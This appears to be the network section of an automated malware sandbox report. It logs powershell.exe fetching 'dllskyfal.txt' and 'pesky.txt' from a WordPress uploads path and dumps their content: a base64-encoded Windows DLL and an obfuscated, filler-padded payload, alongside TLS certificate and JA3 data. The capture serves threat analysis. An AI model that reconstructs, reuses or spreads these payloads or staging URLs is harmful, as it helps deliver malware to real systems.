                                    Sep 26, 2024 10:58:04.407016039 CEST1236INData Raw: 51 44 75 39 47 49 6b 56 47 64 7a 56 47 64 67 34 57 5a 6c 4a 47 49 7a 46 47 61 67 34 32 62 70 52 58 59 6a 6c 47 62 77 42 58 59 67 4d 58 61 6f 52 48 49 30 46 47 61 30 42 79 63 75 39 57 61 7a 4a 58 5a 32 42 79 63 33 39 47 5a 75 6c 32 56 67 55 47 61
                                    Data Ascii: QDu9GIkVGdzVGdg4WZlJGIzFGag42bpRXYjlGbwBXYgMXaoRHI0FGa0Bycu9WazJXZ2Byc39GZul2VgUGa0BiZvBCdzlGbgEEIt0SI8ACIgACIgoQD+42bpRXYjlGbwBXY8ACIgAiCN4jIxYnL5RXaslmYpRXYw12bjpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BSe0lGbpJWa0FGct92Y8ACIK0gCN4zbm5WS0
                                    Sep 26, 2024 10:58:04.407068014 CEST1236INData Raw: 43 41 41 41 41 41 41 55 47 41 34 42 51 5a 41 34 43 41 30 42 67 62 41 55 47 41 70 42 41 62 41 4d 45 41 41 41 51 5a 41 30 47 41 68 42 67 54 41 77 47 41 68 42 67 62 41 49 48 41 6c 42 41 64 41 34 47 41 4a 42 51 41 41 73 41 41 32 41 41 41 41 41 44 41
                                    Data Ascii: CAAAAAAUGA4BQZA4CA0BgbAUGApBAbAMEAAAQZA0GAhBgTAwGAhBgbAIHAlBAdA4GAJBQAAsAA2AAAAADAuAwNA4CAwAgLAEDAAAAAA4GAvBQaAMHAyBQZAYFAlBAbAkGAGBQAAgAAwAAAAAAAAAAAA4GAvBQaAQHAwBQaAIHAjBwcAUGAEBQZAwGApBgRAEAABAgKAAAAAAAAAAAAlBQbAEGAOBQeA4GAhBAcA0GAvBwQAEAAB
                                    Sep 26, 2024 10:58:04.407118082 CEST1236INData Raw: 59 45 4f 45 41 42 67 30 51 33 42 4b 52 42 64 49 77 42 48 77 51 42 64 45 41 41 46 55 69 67 52 77 58 45 43 63 77 42 4f 30 51 41 41 51 67 43 4e 45 41 41 45 55 69 67 52 6f 51 41 41 59 41 44 4b 45 41 41 45 30 67 43 42 41 41 42 4f 6f 51 41 41 51 67 43
                                    Data Ascii: YEOEABg0Q3BKRBdIwBHwQBdEAAFUigRwXECcwBO0QAAQgCNEAAEUigRoQAAYADKEAAE0gCBAABOoQAAQgCKEAAEUigRsQAAYADLEAAE0wCBAABOsQAAQgCLEAAEwXEBcABFEQAgQACF0RBIQwBHgnE4JRAlFYEV4ACIUwBOgnEBcABIAwEBASBIgQBdMwBGwhDOIAAFUACF0RZSQwBIggACcABIgQiCKBCJKoEBUAAMUQHF0RBd
                                    Sep 26, 2024 10:58:04.407151937 CEST1236INData Raw: 59 67 52 6b 58 67 53 45 41 41 49 6b 58 67 53 77 52 41 41 59 67 44 35 46 6f 45 42 41 69 42 46 30 52 64 42 4b 52 41 67 63 51 63 42 4b 42 41 41 55 41 48 42 63 77 41 41 4d 68 41 42 41 53 42 41 4d 42 41 67 51 41 65 53 45 51 5a 42 47 52 46 48 41 77 45
                                    Data Ascii: YgRkXgSEAAIkXgSwRAAYgD5FoEBAiBF0RdBKRAgcQcBKBAAUAHBcwAAMhABASBAMBAgQAeSEQZBGRFHAwEBUWgRUBAgkAeSEgCEAgHB0WgSUBAeEQGSURABABEAMRABASB4JRAZIRFGUQHCgnE4JRAlFYEV4AeSQwBOgACF0RADAyBdFYEIIgAgcgAQwRACAgBF0BCVFoEF0hAcYwBMwRABACBRFoEBEAIGgACF0BCDAyBIUQHI
                                    Sep 26, 2024 10:58:04.407186031 CEST1236INData Raw: 41 49 46 34 41 43 42 41 43 42 30 4a 68 42 44 77 58 45 47 4d 41 43 41 67 79 41 49 67 6e 45 42 67 53 42 49 41 41 49 44 67 41 65 53 45 41 49 46 30 41 65 53 45 41 49 46 6f 41 65 53 45 41 49 46 34 41 65 53 45 41 49 46 67 6e 45 41 41 43 42 34 4a 52 41
                                    Data Ascii: AIF4ACBACB0JhBDwXEGMACAgyAIgnEBgSBIAAIDgAeSEAIF0AeSEAIFoAeSEAIF4AeSEAIFgnEAACB4JRAZIRF4JRACAyC4JhBDwBAoMgAAAyAcAAIDgnEBkhEVEQAgkQDF0RAAUgBF0RAAUACF0RAAUgCF0RAAUQBdUQHBAgBF0hDBAQBxJhBDUQHF0hACAyBF0RBdEAIG4gDBACBOEQAgQAAAAAEEAAAAAEBAAAAgQgDF0RAA
                                    Sep 26, 2024 10:58:04.407217979 CEST1236INData Raw: 48 41 6c 42 41 4c 41 59 44 41 78 41 41 64 41 67 48 41 6c 42 41 4c 41 67 44 41 30 42 41 65 41 55 47 41 6f 55 45 41 41 45 44 41 6a 42 41 4a 41 41 43 41 6c 42 41 63 41 6b 48 41 30 42 41 49 41 6b 43 41 6b 42 51 5a 41 4d 48 41 31 42 41 49 41 49 48 41
                                    Data Ascii: HAlBALAYDAxAAdAgHAlBALAgDA0BAeAUGAoUEAAEDAjBAJAACAlBAcAkHA0BAIAkCAkBQZAMHA1BAIAIHAlBgdAUGAuBAKrAAAgAQfAIDAYBgOAADA79AAAACA9BwMAQEA6AAMAs3DAAgbAUHAoBwYA4GAhBAZAEHA3BQcAkHACBAdAEGASBwYAQ0IAAgLAkCADBQQA0EAoAAIAUGAkBwbAMGAgAgbA8GApBAdAEGAjBQaAQHAu
                                    Sep 26, 2024 10:58:04.407253027 CEST1236INData Raw: 51 5a 41 6b 47 41 73 42 77 51 56 41 41 41 45 42 51 53 41 63 46 41 49 42 41 49 41 49 48 41 79 42 51 52 52 41 41 41 79 41 41 65 46 41 41 41 6c 42 51 62 41 45 47 41 4f 42 51 65 41 77 47 41 6b 42 67 62 41 55 47 41 70 42 67 63 41 59 55 47 42 41 51 66
                                    Data Ascii: QZAkGAsBwQVAAAEBQSAcFAIBAIAIHAyBQRRAAAyAAeFAAAlBQbAEGAOBQeAwGAkBgbAUGApBgcAYUGBAQfAEDA1AAOAIEACBANAADAwAQQAEEAwAAMA0CA1AwMAEDA4AQLAUEADBQMAEDAtAgQAMEAyAANA0CAwAAMAEEAyAwNAIDA1AQNAsXTBAQfAYDA4AQRAMEAxAQMAkDADBAMAEEAwAAMA0CACBwMAQEACBQLAADAkBQMA
                                    Sep 26, 2024 10:58:04.412096024 CEST1236INData Raw: 47 41 4f 42 77 4d 41 51 47 41 32 42 67 55 41 30 47 41 69 42 41 63 41 51 47 41 47 42 41 57 41 41 44 41 61 42 67 4d 41 49 47 41 36 42 51 4f 41 30 47 41 6a 42 67 61 41 77 47 41 58 42 41 56 41 4d 47 41 57 42 77 61 41 55 46 41 43 42 41 5a 41 59 45 41
                                    Data Ascii: GAOBwMAQGA2BgUA0GAiBAcAQGAGBAWAADAaBgMAIGA6BQOA0GAjBgaAwGAXBAVAMGAWBwaAUFACBAZAYEAWBwRAkDAwAQVBCYAAQHApBAeAUGAgAgJAACAnAgITEAAiAwJAACAyBAdA8CAgAgIRAAAiMAAAcGA0AwRAQGA2BQQAMEAkBgeAYFAHBQYA4GAsBwRAEGAnBwdA0GAjBgdAEEApBgYAYHAkBgMAIGAzBQNAIDAiBwZA


                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                    Sep 26, 2024 10:58:02.723344088 CEST15.235.85.194443192.168.2.549719CN=informacionoportuna.com CN=R11, O=Let's Encrypt, C=USCN=R11, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USSat Sep 21 02:27:28 CEST 2024 Wed Mar 13 01:00:00 CET 2024Fri Dec 20 01:27:27 CET 2024 Sat Mar 13 00:59:59 CET 2027771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                    CN=R11, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.54970415.235.85.1944436644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-26 08:57:01 UTC117OUTGET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1
                                    Host: www.informacionoportuna.com
                                    Connection: Keep-Alive
                                    2024-09-26 08:57:01 UTC211INHTTP/1.1 200 OK
                                    Connection: close
                                    content-type: text/plain
                                    last-modified: Mon, 16 Sep 2024 03:18:42 GMT
                                    accept-ranges: bytes
                                    content-length: 11608
                                    date: Thu, 26 Sep 2024 08:57:01 GMT
                                    server: LiteSpeed
                                    2024-09-26 08:57:01 UTC1157INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4c 6d 64 35 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 6a 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                    Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALmd52YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAjjgAAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                    2024-09-26 08:57:01 UTC10451INData Raw: 77 49 41 41 41 72 2b 41 52 4d 4d 45 51 77 35 41 67 45 41 41 41 41 62 6a 51 59 41 41 41 45 6c 46 6e 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41 43 67 42 79 37 67 45 41 63 43 67 4b 41 41 41 4b 63 74 34 42 41 48 41 6f 44 67 41 41 43 68 59 57 46 53 67 50 41 41 41 4b 4a 68 75 4e 42 67 41 41 41 53 55 57 63 6f 6b 43 41 48 43 69 4a 52 63 44 6f 69 55 59 63 72 38 43 41 48 43 69 4a 52 6b 6f 43 67 41 41 43 71 49 6c 47 6e 4c 68 41 67 42 77 6f 69 67 4c 41 41 41 4b 46 68 59 56 4b 41 38 41 41 41 6f 6d 63 75 55 43 41 48 41 54 44 68 75 4e 42 67 41 41 41 53 55 57 45 51 36 69
                                    Data Ascii: wIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFnJRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6i


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.54970515.235.85.1944436644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-26 08:57:02 UTC89OUTGET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1
                                    Host: www.informacionoportuna.com
                                    2024-09-26 08:57:02 UTC211INHTTP/1.1 200 OK
                                    Connection: close
                                    content-type: text/plain
                                    last-modified: Mon, 16 Sep 2024 02:52:42 GMT
                                    accept-ranges: bytes
                                    content-length: 57008
                                    date: Thu, 26 Sep 2024 08:57:02 GMT
                                    server: LiteSpeed
                                    2024-09-26 08:57:02 UTC1157INData Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82
                                    Data Ascii:
                                    2024-09-26 08:57:02 UTC14994INData Raw: 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                    Data Ascii:
                                    2024-09-26 08:57:02 UTC16384INData Raw: 5a 53 52 57 5a 77 6c 48 56 35 78 32 5a 75 39 6d 63 30 4e 6c 4c 7a 78 32 62 76 52 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 44 e3 81 82 e3 81 82 e3 81 82 42 45 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6a 4c 77 34 43 4d 75 45 54 4d 49 55 47 64 68 78 47 63 74 56 47 56 35 31 6b 43 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 47 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 43 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3
                                    Data Ascii: ZSRWZwlHV5x2Zu9mc0NlLzx2bvRlLzV2YyV3bzVmUu0WZ0NXeTNDBEEjLw4CMuETMIUGdhxGctVGV51kCEGQEC
                                    2024-09-26 08:57:02 UTC16384INData Raw: e3 81 82 e3 81 82 67 67 45 e3 81 82 e3 81 82 e3 81 82 4d e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 70 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 6e e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 77 35 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3
                                    Data Ascii: ggEMopIonEsQIEw5EsQI
                                    2024-09-26 08:57:02 UTC8089INData Raw: 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 77 51 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 71 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4d 42 4b 43 34 68 4b 47 6f 67 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 44 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4c 57 45 77 4b 58 45 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 63 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 67 44 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                    Data Ascii: wQQMTqoMBKC4hKGogBQDoLWEwKXEBcgDEMT


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.54971615.235.85.1944437896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-26 08:57:22 UTC117OUTGET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1
                                    Host: www.informacionoportuna.com
                                    Connection: Keep-Alive
                                    2024-09-26 08:57:22 UTC211INHTTP/1.1 200 OK
                                    Connection: close
                                    content-type: text/plain
                                    last-modified: Mon, 16 Sep 2024 03:18:42 GMT
                                    accept-ranges: bytes
                                    content-length: 11608
                                    date: Thu, 26 Sep 2024 08:57:22 GMT
                                    server: LiteSpeed
                                    2024-09-26 08:57:22 UTC1157INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4c 6d 64 35 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 6a 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                    Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALmd52YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAjjgAAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                    2024-09-26 08:57:22 UTC10451INData Raw: 77 49 41 41 41 72 2b 41 52 4d 4d 45 51 77 35 41 67 45 41 41 41 41 62 6a 51 59 41 41 41 45 6c 46 6e 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41 43 67 42 79 37 67 45 41 63 43 67 4b 41 41 41 4b 63 74 34 42 41 48 41 6f 44 67 41 41 43 68 59 57 46 53 67 50 41 41 41 4b 4a 68 75 4e 42 67 41 41 41 53 55 57 63 6f 6b 43 41 48 43 69 4a 52 63 44 6f 69 55 59 63 72 38 43 41 48 43 69 4a 52 6b 6f 43 67 41 41 43 71 49 6c 47 6e 4c 68 41 67 42 77 6f 69 67 4c 41 41 41 4b 46 68 59 56 4b 41 38 41 41 41 6f 6d 63 75 55 43 41 48 41 54 44 68 75 4e 42 67 41 41 41 53 55 57 45 51 36 69
                                    Data Ascii: wIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFnJRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6i


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.54971715.235.85.1944437896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-26 08:57:23 UTC89OUTGET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1
                                    Host: www.informacionoportuna.com
                                    2024-09-26 08:57:23 UTC211INHTTP/1.1 200 OK
                                    Connection: close
                                    content-type: text/plain
                                    last-modified: Mon, 16 Sep 2024 02:52:42 GMT
                                    accept-ranges: bytes
                                    content-length: 57008
                                    date: Thu, 26 Sep 2024 08:57:23 GMT
                                    server: LiteSpeed
                                    2024-09-26 08:57:23 UTC1157INData Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82
                                    Data Ascii:
                                    2024-09-26 08:57:23 UTC14994INData Raw: 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                    Data Ascii:
                                    2024-09-26 08:57:24 UTC16384INData Raw: 5a 53 52 57 5a 77 6c 48 56 35 78 32 5a 75 39 6d 63 30 4e 6c 4c 7a 78 32 62 76 52 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 44 e3 81 82 e3 81 82 e3 81 82 42 45 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6a 4c 77 34 43 4d 75 45 54 4d 49 55 47 64 68 78 47 63 74 56 47 56 35 31 6b 43 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 47 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 43 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3
                                    Data Ascii: ZSRWZwlHV5x2Zu9mc0NlLzx2bvRlLzV2YyV3bzVmUu0WZ0NXeTNDBEEjLw4CMuETMIUGdhxGctVGV51kCEGQEC
                                    2024-09-26 08:57:24 UTC16384INData Raw: e3 81 82 e3 81 82 67 67 45 e3 81 82 e3 81 82 e3 81 82 4d e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 70 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 6e e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 77 35 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3
                                    Data Ascii: ggEMopIonEsQIEw5EsQI
